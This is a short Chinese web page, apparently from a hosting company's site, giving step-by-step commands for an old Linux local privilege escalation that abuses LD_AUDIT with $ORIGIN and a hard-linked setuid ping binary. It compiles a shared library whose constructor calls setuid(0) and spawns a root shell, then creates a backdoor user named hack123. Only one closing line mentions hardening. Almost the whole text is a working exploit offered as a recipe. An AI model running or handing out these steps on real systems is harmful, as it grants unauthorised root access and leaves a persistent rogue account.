我们专注服务于当下互联网基础设施建设与云计算、大数据时代的各种需求!

很久的linux提权的一些过程

阵列笔记mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target

ls -l /proc/$$/fd/3
rm -rf /tmp/exploit/
ls -l /proc/$$/fd/3
vi s.c
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}

gcc -w -fPIC -shared -o /tmp/exploit s.c

LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 && adduser hack123 -p hack123


可以根据执行的命令,进行一系列的安全加固,比如ping的S权限等